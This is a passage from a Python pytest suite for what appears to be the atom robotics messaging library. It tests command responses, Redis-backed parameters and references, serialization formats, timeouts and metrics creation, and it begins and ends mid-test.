self._element_cleanup(responder2)
del responder1
del responder2
def test_no_ack(self, caller, responder):
"""
Element sends command and responder does not acknowledge.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
response = caller.command_send(responder_name, "add_1", 0)
assert response["err_code"] == ATOM_COMMAND_NO_ACK
def test_unsupported_command(self, caller, responder):
"""
Element sends command that responder does not have.
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
response = caller.command_send(responder_name, "add_1", 0)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_COMMAND_UNSUPPORTED
def test_command_timeout(self, caller, responder):
"""
Element sends command to responder that does not return data within the
timeout.
"""
caller, caller_name = caller
responder, responder_name = responder
# Set a timeout of 10 ms
responder.command_add("sleep_ms", sleep_ms, 10, serialization="msgpack")
self._element_start(responder, caller)
response = caller.command_send(
responder_name, "sleep_ms", 1000, serialization="msgpack"
)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_COMMAND_NO_RESPONSE
def test_handler_returns_not_response(self, caller, responder):
"""
Element calls command from responder that does not return an object of
type Response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("ret_not_response", lambda x: 0)
self._element_start(responder, caller)
response = caller.command_send(responder_name, "ret_not_response", None)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_CALLBACK_FAILED
# TODO: come back and fix logging tests once that's sorted
# def test_log(self, caller):
# """
# Writes a log with each severity level and ensures that all the logs
# exist.
# """
# caller, caller_name = caller
# for i, severity in enumerate(LogLevel):
# caller.log(severity, f"severity {i}", stdout=False)
# logs = caller._rclient.xread({"log": 0})[0][1]
# logs = logs[-8:]
# for i in range(8):
# assert logs[i][1][b"msg"].decode() == f"severity {i}"
def test_parameter_write(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data)
param_data = caller.parameter_read(key)
assert param_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_read_field(self, caller):
"""
Writes parameter with multiple fields; verifies that
a single field can be successfully read.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data)
param_data = caller.parameter_read(key, fields="str2")
assert param_data == {b"str2": b"goodbye"}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_msgpack(self, caller):
"""
Writes parameter with msgpack serialization.
Verifies it is successfully deserialized when read.
"""
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, serialization="msgpack")
param_data = caller.parameter_read(key)
assert param_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_read_msgpack_field(self, caller):
"""
Writes parameter with multiple fields serialized with msgpack.
Verifies that a single field is successfully read and deserialized.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, serialization="msgpack")
param_data = caller.parameter_read(key, fields=["str2"])
assert param_data == {b"str2": b"goodbye"}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_override_true(self, caller):
"""
Writes parameter with override allowed. Updates one existing
field. Reads parameter and checks field was updated.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data)
new_data = {b"str2": b"goodbye again"}
updated = caller.parameter_write(key, new_data)
assert updated == [b"str2"]
new_data = caller.parameter_read(key)
assert new_data == {b"str1": b"hello, world!", b"str2": b"goodbye again"}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_override_false(self, caller):
"""
Writes parmaeter with override not allowed. Tries updating
existing field and verifies that exception is raised. Reads
parameter and checks field was not updated.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, override=False)
new_data = {b"str2": b"goodbye again"}
with pytest.raises(Exception):
_ = caller.parameter_write(key, new_data)
current_data = caller.parameter_read(key)
assert current_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_override_false_allows_new_key(self, caller):
"""
Writes parameter with override not allowed. Tries adding new field
to parameter and verifies new field was successfully added.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, override=False)
new_data = {b"str3": b"goodbye again"}
new_fields = caller.parameter_write(key, new_data)
assert new_fields == [b"str3"]
new_data = caller.parameter_read(key)
assert new_data == {
b"str1": b"hello, world!",
b"str2": b"goodbye",
b"str3": b"goodbye again",
}
success = caller.parameter_delete(key)
assert success == True
def test_parameter_write_new_serialization_raises_error(self, caller):
"""
Writes parameter with msgpack serialization. Attempts to add
new field with no serialization; verifies that exception is raised
and existing parameter is not changed.
"""
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, serialization="msgpack")
new_data = {b"str3": b"goodbye again"}
with pytest.raises(Exception):
_ = caller.parameter_write(key, new_data)
current_data = caller.parameter_read(key)
assert current_data == data
success = caller.parameter_delete(key)
assert success == True
def test_parameter_get_override(self, caller):
caller, caller_name = caller
data = {b"str1": b"hello, world!", b"str2": b"goodbye"}
key = "my_param"
_ = caller.parameter_write(key, data, override=False)
override = caller.parameter_get_override(key)
assert override == "false"
success = caller.parameter_delete(key)
assert success == True
def test_parameter_get_override_doesnt_exist(self, caller):
caller, caller_name = caller
key = "my_param"
with pytest.raises(Exception):
_ = caller.parameter_get_override(key)
def test_parameter_default_timeout_is_none(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms == -1
success = caller.parameter_delete(key)
assert success == True
def test_parameter_get_timeout_ms(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=1000)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms > 0 and remaining_ms <= 1000
time.sleep(0.1)
still_remaining_ms = caller.parameter_get_timeout_ms(key)
assert (still_remaining_ms < remaining_ms) and (still_remaining_ms > 0)
success = caller.parameter_delete(key)
assert success == True
def test_parameter_update_timeout_ms(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=1000)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms > 0 and remaining_ms <= 1000
caller.parameter_update_timeout_ms(key, 10000)
updated_ms = caller.parameter_get_timeout_ms(key)
assert (updated_ms > 1000) and (updated_ms <= 10000)
success = caller.parameter_delete(key)
assert success == True
def test_parameter_remove_timeout(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=1000)
remaining_ms = caller.parameter_get_timeout_ms(key)
assert remaining_ms > 0 and remaining_ms <= 1000
caller.parameter_update_timeout_ms(key, 0)
updated_ms = caller.parameter_get_timeout_ms(key)
assert updated_ms == -1
success = caller.parameter_delete(key)
assert success == True
def test_parameter_delete(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=0)
param_data = caller.parameter_read(key)
assert param_data == data
timeout_ms = caller.parameter_get_timeout_ms(key)
assert timeout_ms == -1
success = caller.parameter_delete(key)
assert success == True
del_data = caller.parameter_read(key)
assert del_data is None
def test_parameter_delete_missing(self, caller):
caller, caller_name = caller
data = {b"my_str": b"hello, world!"}
key = "my_param"
_ = caller.parameter_write(key, data, timeout_ms=0)
success = caller.parameter_delete(key)
assert success == True
del_data = caller.parameter_read(key)
assert del_data is None
success = caller.parameter_delete(key)
assert success == False
def test_parameter_list(self, caller):
"""
Writes parameters, verifies that parameter_list lists exactly
the parameters that exist at any point in time, and then cleans
up written parameters
"""
caller, caller_name = caller
assert len(caller.parameter_list()) == 0
keys = ["str1", "str2", "other"]
data = [
{b"k1": b"hello, world"},
{b"k1": b"hello, world!", b"str2": b"goodbye"},
{b"k3": b"hello"},
]
_ = caller.parameter_write(keys[0], data[0], serialization="msgpack")
assert set([keys[0]]) == set(caller.parameter_list())
assert [] == caller.parameter_list("str2")
assert [] == caller.parameter_list("other")
_ = caller.parameter_write(
keys[1],
data[1],
serialization="msgpack",
)
assert set(keys[0:2]) == set(caller.parameter_list())
assert [] == caller.parameter_list("other")
_ = caller.parameter_write(keys[2], data[2], serialization="msgpack")
assert set(keys) == set(caller.parameter_list())
for i, key in enumerate(keys):
success = caller.parameter_delete(key)
assert success == True
assert set(keys[i + 1 :]) == set(caller.parameter_list())
def test_parameter_list_pattern_matching(self, caller):
"""
Writes 3 parameters, tests that parameter_list can correctly
return parameters matching a few patterns, as described in
https://redis.io/commands/KEYS, then deletes the parameters.
"""
caller, caller_name = caller
keys = ["str1", "str2", "spr2", "sppr2"]
data = [
{b"k1": b"hello, world"},
{b"k1": b"hello, world!", b"str2": b"goodbye"},
{b"k3": b"hello"},
{b"k1": b"hello, world!", b"str2": b"goodbye"},
]
for i, key in enumerate(keys):
_ = caller.parameter_write(key, data[i], serialization="msgpack")
assert set(keys) == set(caller.parameter_list())
assert set(keys[0:2]) == set(caller.parameter_list("str*"))
assert ["spr2"] == caller.parameter_list("spr2")
assert ["str1"] == caller.parameter_list("str1")
assert ["str2"] == caller.parameter_list("str2")
assert [] == caller.parameter_list("str")
assert set(["str2", "spr2"]) == set(caller.parameter_list("s?r2"))
assert set(["str2", "spr2", "sppr2"]) == set(caller.parameter_list("s*r2"))
assert ["str1"] == caller.parameter_list("str[^2]")
assert [] == caller.parameter_list("str[4-9]")
for key in keys:
success = caller.parameter_delete(key)
assert success == True
def test_reference_basic(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data)[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_user_key(self, caller):
caller, caller_name = caller
data = b"hello, world!"
key = "my_string"
ref_id = caller.reference_create(data, keys=key)[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_doesnt_exist(self, caller):
caller, caller_name = caller
ref_id = "nonexistent"
ref_data = caller.reference_get(ref_id)[0]
assert ref_data is None
def test_reference_legacy_serialization(self, caller):
caller, caller_name = caller
data = {
"hello": "world",
"atom": 123456,
"some_obj": {"references": "are fun!"},
}
ref_id = caller.reference_create(data, serialize=True)[0]
ref_data = caller.reference_get(ref_id, deserialize=True)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_arrow(self, caller):
"""
Creates references serialized with Apache Arrow; gets references and
deserializes based on serialization method embedded within reference
key.
"""
caller, caller_name = caller
data = {
"hello": "world",
"atom": 123456,
"some_obj": {"references": "are fun!"},
}
ref_id = caller.reference_create(data, serialization="arrow")[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_msgpack_dne(self, caller):
caller, caller_name = caller
ref_id = "nonexistent"
ref_data = caller.reference_get(ref_id, serialization="msgpack")[0]
assert ref_data is None
def test_reference_multiple(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"robots are fun!"]
ref_ids = caller.reference_create(*data)
ref_data = caller.reference_get(*ref_ids)
for i in range(len(data)):
assert ref_data[i] == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_multiple_user_keys(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"robots are fun!"]
ref_ids = caller.reference_create(*data, keys=["ref1", "ref2"])
assert "ref1" in ref_ids[0] and "ref2" in ref_ids[1]
ref_data = caller.reference_get(*ref_ids)
for i in range(len(data)):
assert ref_data[i] == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_multiple_mismatch_keys(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"robots are fun!"]
with pytest.raises(Exception):
_ = caller.reference_create(*data, keys=["ref1"])
def test_reference_multiple_mismatch_keys_2(self, caller):
caller, caller_name = caller
data = [b"hello, world!"]
with pytest.raises(Exception):
_ = caller.reference_create(*data, keys=["ref1", "ref2"])
def test_reference_multiple_msgpack(self, caller):
caller, caller_name = caller
data = [
{"hello": "world", "atom": 123456, "some_obj": {"references": "are fun!"}},
True,
]
ref_ids = caller.reference_create(*data, serialization="msgpack")
ref_data = caller.reference_get(*ref_ids)
for i in range(len(data)):
assert ref_data[i] == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_multiple_mixed_serialization(self, caller):
caller, caller_name = caller
data = [{"hello": "world"}, b"123456"]
ref_ids = []
ref_ids.extend(caller.reference_create(data[0], serialization="msgpack"))
ref_ids.extend(caller.reference_create(data[1], serialization="none"))
ref_data = caller.reference_get(*ref_ids)
for ref, orig in zip(ref_data, data):
assert ref == orig
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_reference_get_timeout_ms(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=1000)[0]
ref_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_remaining_ms > 0 and ref_remaining_ms <= 1000
time.sleep(0.1)
ref_still_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert (ref_still_remaining_ms < ref_remaining_ms) and (
ref_still_remaining_ms > 0
)
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_update_timeout_ms(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=1000)[0]
ref_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_remaining_ms > 0 and ref_remaining_ms <= 1000
caller.reference_update_timeout_ms(ref_id, 10000)
ref_updated_ms = caller.reference_get_timeout_ms(ref_id)
assert (ref_updated_ms > 1000) and (ref_updated_ms <= 10000)
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_remove_timeout(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=1000)[0]
ref_remaining_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_remaining_ms > 0 and ref_remaining_ms <= 1000
caller.reference_update_timeout_ms(ref_id, 0)
ref_updated_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_updated_ms == -1
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
def test_reference_delete(self, caller):
caller, caller_name = caller
data = b"hello, world!"
ref_id = caller.reference_create(data, timeout_ms=0)[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
ref_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_ms == -1
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
del_data = caller.reference_get(ref_id)[0]
assert del_data is None
def test_reference_delete_multiple(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"test"]
ref_ids = caller.reference_create(*data, timeout_ms=0)
ref_data = caller.reference_get(*ref_ids)
assert ref_data[0] == data[0]
assert ref_data[1] == data[1]
ref_ms = caller.reference_get_timeout_ms(ref_ids[0])
assert ref_ms == -1
ref_ms = caller.reference_get_timeout_ms(ref_ids[1])
assert ref_ms == -1
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
del_data = caller.reference_get(*ref_ids)
assert del_data[0] is None
assert del_data[1] is None
def test_reference_delete_single_missing(self, caller):
caller, caller_name = caller
data = [b"hello, world!", b"test"]
ref_ids = caller.reference_create(*data, timeout_ms=0)
ref_data = caller.reference_get(*ref_ids)
assert ref_data[0] == data[0]
assert ref_data[1] == data[1]
ref_ms = caller.reference_get_timeout_ms(ref_ids[0])
assert ref_ms == -1
ref_ms = caller.reference_get_timeout_ms(ref_ids[1])
assert ref_ms == -1
missing_str = "bad-reference"
ref_ids.append(missing_str)
success, failed = caller.reference_delete(*ref_ids)
assert success == False
assert failed == [missing_str]
def test_reference_delete_all_missing(self, caller):
caller, caller_name = caller
missing_references = ["ref-a", "ref-b", "ref-c", "ref-"]
success, failed = caller.reference_delete(*missing_references)
assert success == False
assert failed == missing_references
def test_reference_delete_msgpack(self, caller):
caller, caller_name = caller
data = {"msgpack": "data"}
ref_id = caller.reference_create(data, timeout_ms=0, serialization="msgpack")[0]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
ref_ms = caller.reference_get_timeout_ms(ref_id)
assert ref_ms == -1
success, failed = caller.reference_delete(ref_id)
assert success == True
assert len(failed) == 0
del_data = caller.reference_get(ref_id)[0]
assert del_data is None
def test_reference_expire(self, caller):
caller, caller_name = caller
data = {"msgpack": "data"}
ref_id = caller.reference_create(data, serialization="msgpack", timeout_ms=500)[
0
]
ref_data = caller.reference_get(ref_id)[0]
assert ref_data == data
time.sleep(0.5)
expired_data = caller.reference_get(ref_id)[0]
assert expired_data is None
def test_reference_create_from_stream_single_key(self, caller):
caller, caller_name = caller
stream_name = "test_ref"
stream_data = {"data": b"test reference!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
ref_data = caller.reference_get(key_dict["data"])[0]
assert ref_data == stream_data["data"]
success, failed = caller.reference_delete(key_dict["data"])
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": b"value 1!", "key2": b"value 2!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
assert ref_data == stream_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_legacy_serialization(
self, caller
):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": {"nested1": "val1"}, "key2": {"nested2": "val2"}}
orig_stream_data = copy.deepcopy(stream_data)
caller.entry_write(stream_name, stream_data, serialize=True)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key], deserialize=True)[0]
assert ref_data == orig_stream_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_arrow(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": {"nested1": "val1"}, "key2": {"nested2": "val2"}}
orig_stream_data = copy.deepcopy(stream_data)
caller.entry_write(stream_name, stream_data, serialization="arrow")
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
assert ref_data == orig_stream_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_persist(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": b"value 1!", "key2": b"value 2!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
for key in key_dict:
assert caller.reference_get_timeout_ms(key_dict[key]) == -1
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_reference_create_from_stream_multiple_keys_timeout(self, caller):
caller, caller_name = caller
stream_name = "test_ref_multiple_keys"
stream_data = {"key1": b"value 1!", "key2": b"value 2!"}
caller.entry_write(stream_name, stream_data)
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=500
)
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
assert ref_data == stream_data[key]
time.sleep(0.5)
for key in key_dict:
assert caller.reference_get(key_dict[key])[0] is None
def test_reference_create_from_stream_multiple_keys_latest(self, caller):
caller, caller_name = caller
def get_data(i):
return {"key1": f"value {i}!", "key2": f"value {i}!"}
stream_name = "test_ref_multiple_keys"
# Write all of the keys and get IDs back
ids = []
for i in range(10):
stream_data = get_data(i)
ids.append(
caller.entry_write(stream_name, stream_data, serialization="msgpack")
)
# Check that we can get each of them individually
for i, id_val in enumerate(ids):
# Make the reference to the particular ID
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, stream_id=id_val, timeout_ms=0
)
# Loop over the references and check the data
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
correct_data = get_data(i)
assert ref_data == correct_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
# Now, check the final piece and make sure it's the most recent
key_dict = caller.reference_create_from_stream(
caller.name, stream_name, timeout_ms=0
)
# Loop over the references and check the data
for key in key_dict:
ref_data = caller.reference_get(key_dict[key])[0]
correct_data = get_data(9)
assert ref_data == correct_data[key]
success, failed = caller.reference_delete(*key_dict.values())
assert success == True
assert len(failed) == 0
def test_entry_read_n_ignore_serialization(self, caller):
caller, caller_name = caller
test_data = {"some_key": "some_val"}
caller.entry_write("test_stream", {"data": test_data}, serialization="msgpack")
entries = caller.entry_read_n(
caller_name, "test_stream", 1, serialization=None, force_serialization=True
)
assert test_data == unpackb(entries[0]["data"], raw=False)
def test_entry_read_since_ignore_serialization(self, caller):
caller, caller_name = caller
test_data_1 = {"some_key": "some_val"}
test_data_2 = {"some_other_key": "some_other_val"}
data_1_id = caller.entry_write(
"test_stream", {"data": test_data_1}, serialization="msgpack"
)
caller.entry_write(
"test_stream", {"data": test_data_2}, serialization="msgpack"
)
entries = caller.entry_read_since(
caller_name,
"test_stream",
last_id=data_1_id,
serialization=None,
force_serialization=True,
)
assert test_data_2 == unpackb(entries[0]["data"], raw=False)
def test_reference_ignore_serialization(self, caller):
caller, caller_name = caller
data = [
{"hello": "world", "atom": 123456, "some_obj": {"references": "are fun!"}},
True,
]
ref_ids = caller.reference_create(*data, serialization="msgpack")
ref_data = caller.reference_get(
*ref_ids, serialization=None, force_serialization=True
)
for i in range(len(data)):
assert unpackb(ref_data[i], raw=False) == data[i]
success, failed = caller.reference_delete(*ref_ids)
assert success == True
assert len(failed) == 0
def test_command_response_wrong_n_workers(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
# this should be a non-blocking call
with pytest.raises(ValueError):
responder.command_loop(n_workers=-1)
def test_timeout_ms(self):
then = time.time()
with pytest.raises(ElementConnectionTimeoutError):
e = self._element_create(
"timeout-element-1", host="10.255.255.1", conn_timeout_ms=2000
)
assert e._redis_connection_timeout == 2.0
e._rclient.keys()
now = time.time()
diff = now - then
assert int(round(diff, 2)) == 2
def test_metrics_create_basic(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.retention_msecs == 10000
def test_metrics_create_label(self, caller, metrics):
caller, caller_name = caller
label_dict = {"single": "label"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", labels=label_dict
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
def test_metrics_create_labels(self, caller, metrics):
caller, caller_name = caller
label_dict = {"label1": "hello", "label2": "world"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", labels=label_dict
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
def test_validate_metrics_labels_enforced(self, caller, metrics):
enforced = False
caller, caller_name = caller
label_dict = {"label1": "", "label2": "valid"}
try:
caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", labels=label_dict
)
except AtomError as e:
print(e)
enforced = True
assert enforced is True
def test_metrics_create_rule(self, caller, metrics):
caller, caller_name = caller
rules = [("sum", 10000, 200000)]
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules
)
assert data == "some_metric"
data = metrics.info("some_metric")
print(data.rules)
assert len(data.rules) == 1
assert data.rules[0][0] == b"some_metric_SUM_10000"
assert data.rules[0][1] == 10000
assert data.rules[0][2] == b"SUM"
data = metrics.info("some_metric_SUM_10000")
assert data.retention_msecs == 200000
def test_metrics_create_rules(self, caller, metrics):
caller, caller_name = caller
rules = [
("sum", 10000, 200000),
("avg", 86400, 604800),
]
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert len(data.rules) == 2
sum_idx = 0 if data.rules[0][0] == b"some_metric_SUM_10000" else 1
avg_idx = 1 if sum_idx == 0 else 0
assert data.rules[sum_idx][0] == b"some_metric_SUM_10000"
assert data.rules[sum_idx][1] == 10000
assert data.rules[sum_idx][2] == b"SUM"
assert data.rules[avg_idx][0] == b"some_metric_AVG_86400"
assert data.rules[avg_idx][1] == 86400
assert data.rules[avg_idx][2] == b"AVG"
data = metrics.info("some_metric_SUM_10000")
assert data.retention_msecs == 200000
data = metrics.info("some_metric_AVG_86400")
assert data.retention_msecs == 604800
def test_metrics_create_already_created(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
def test_metrics_create_update(self, caller, metrics):
caller, caller_name = caller
rules = [
("sum", 10000, 200000),
("avg", 86400, 604800),
]
label_dict = {"label1": "hello", "label2": "world"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules, labels=label_dict
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
assert len(data.rules) == 2
sum_idx = 0 if data.rules[0][0] == b"some_metric_SUM_10000" else 1
avg_idx = 1 if sum_idx == 0 else 0
assert data.rules[sum_idx][0] == b"some_metric_SUM_10000"
assert data.rules[sum_idx][1] == 10000
assert data.rules[sum_idx][2] == b"SUM"
assert data.rules[avg_idx][0] == b"some_metric_AVG_86400"
assert data.rules[avg_idx][1] == 86400
assert data.rules[avg_idx][2] == b"AVG"
data = caller.metrics_create_custom(
MetricsLevel.INFO,
"some_metric",
rules=rules,
labels=label_dict,
update=True,
)
assert data == "some_metric"
rules = [
("min", 6000, 1000),
("max", 5000, 10000),
]
label_dict = {"label1": "elementary", "label2": "robotics"}
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", rules=rules, labels=label_dict
)
assert data == "some_metric"
data = caller.metrics_create_custom(
MetricsLevel.INFO,
"some_metric",
rules=rules,
labels=label_dict,
update=True,
)
assert data == "some_metric"
data = metrics.info("some_metric")
assert data.labels == label_dict
assert len(data.rules) == 2
max_idx = 0 if data.rules[0][0] == b"some_metric_MAX_5000" else 1
min_idx = 1 if max_idx == 0 else 0
assert data.rules[max_idx][0] == b"some_metric_MAX_5000"
assert data.rules[max_idx][1] == 5000
assert data.rules[max_idx][2] == b"MAX"
assert data.rules[min_idx][0] == b"some_metric_MIN_6000"
assert data.rules[min_idx][1] == 6000
assert data.rules[min_idx][2] == b"MIN"
def test_metrics_add(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42)
print(data)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
# make a metric and have the timestamp auto-created
data = metrics.get("some_metric")
assert data[1] == 42
# Make sure the auto-generated timestamp is within 1s of the unix time
assert (time.time() * 1000) - data[0] <= 1000
def test_metrics_add_set_timestamp_int(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42, timestamp=1)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
# make a metric and have the timestamp auto-created
data = metrics.get("some_metric")
assert data[1] == 42
assert data[0] == 1
def test_metrics_add_set_timestamp_time(self, caller, metrics):
caller, caller_name = caller
curr_time = int(time.time() * 1000)
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42, timestamp=curr_time)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
# make a metric and have the timestamp auto-created
data = metrics.get("some_metric")
assert data[1] == 42
assert data[0] == curr_time
def test_metrics_add_multiple(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
time.sleep(0.001)
data = caller.metrics_add("some_metric", 2020)
assert (
len(data) == 1
and type(data[0]) == list
and len(data[0]) == 1
and type(data[0][0]) == int
)
# make a metric and have the timestamp auto-created
data = metrics.range("some_metric", 1, -1)
assert data[0][1] == 42
assert data[1][1] == 2020
def test_metrics_add_multiple_handle_same_timestamp(self, caller, metrics):
caller, caller_name = caller
data = caller.metrics_create_custom(
MetricsLevel.INFO, "some_metric", retention=10000
)
assert data == "some_metric"
data = caller.metrics_add("some_metric", 42, timestamp=1234)
assert len(data) == 1 and type(data[0]) == list and data[0][0] == 1234
data = caller.metrics_add("some_metric", 2020, timestamp=1234)
